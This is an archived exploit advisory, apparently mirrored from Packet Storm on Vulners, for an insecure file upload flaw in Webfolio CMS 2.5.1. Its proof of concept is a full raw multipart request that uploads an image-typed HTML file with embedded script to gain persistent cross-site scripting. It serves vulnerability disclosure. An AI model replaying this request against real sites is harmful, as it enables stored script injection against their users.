Vulners
Lucene search
Webfolio CMS 2.5.1 Insecure File Upload
🗓️ 05 Aug 2015 00:00:00Reported by Sharankumar SomanaType 
packetstorm🔗 packetstormsecurity.com👁 20 Views
`# Exploit Title: Insecure File Upload in webfolio2.5.1
# Date:04 august 2015
# Exploit Author: Sharankumar somana
# Vendor Homepage: http://webfolio-cms.sourceforge.net/
# Software Link: http://sourceforge.net/projects/webfolio-cms/?source=typ_redirect
# Version: 2.5.1
# Tested on: Windows 7
_________________________________________________________________________________________________________________________
Insecure File Upload
Webfolio cms is vulnerable for insecure file upload vulnerability.The applictaion checks for the size and content type of the files while uploading, however it fails to check the extention of the uploaded files. A malicious user can successfully upload a valid image file with javascript embedded in it and changing the extention to html. An attacker can take advantage of this issue to perform persistent cross site scripting attacks.
Raw Request:
POST /webfolio/wfcms2/admin/users/edit/1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://localhost/webfolio/wfcms2/admin/users/edit/1
Cookie: PHPSESSID=fp7drdbohoi5v1ni242iuoq303;
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------17740215416001
Content-Length: 123677
-----------------------------17740215416001
Content-Disposition: form-data; name="UserAccountInfo[username]"
admin
-----------------------------17740215416001
Content-Disposition: form-data; name="UserAccountInfo[password]"
-----------------------------17740215416001
Content-Disposition: form-data; name="UserAccountInfo[passwdConfirm]"
-----------------------------17740215416001
Content-Disposition: form-data; name="UserAccountInfo[email]"
[email protected]
-----------------------------17740215416001
Content-Disposition: form-data; name="UserAccountInfo[role]"
10
-----------------------------17740215416001
Content-Disposition: form-data; name="UserProfile[realName]"
sharan
-----------------------------17740215416001
Content-Disposition: form-data; name="UserProfile[aboutText]"
testing 123
-----------------------------17740215416001
Content-Disposition: form-data; name="UserProfile[dateOfBirth]"
1990-08-04
-----------------------------17740215416001
Content-Disposition: form-data; name="UserProfile[picture]"; filename="test.html"
Content-Type: image/jpeg
Valid image file data followed by javascript code
<html>
<script>alert(1)</script>
</html>
-----------------------------17740215416001
Content-Disposition: form-data; name="UserProfile[picture][current_file_name]"
php1678_55bfc11748cdf.html
-----------------------------17740215416001
Content-Disposition: form-data; name="UserProfile[timeZone]"
UTC
-----------------------------17740215416001
Content-Disposition: form-data; name="UserProfile[website]"
-----------------------------17740215416001
Content-Disposition: form-data; name="_csrf"
af184c6a94f8485fae50c8e5bc320695
-----------------------------17740215416001
Content-Disposition: form-data; name="btnSave"
Save changes
-----------------------------17740215416001--
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Aug 2015 00:00Current
7.4High risk
Vulners AI Score7.4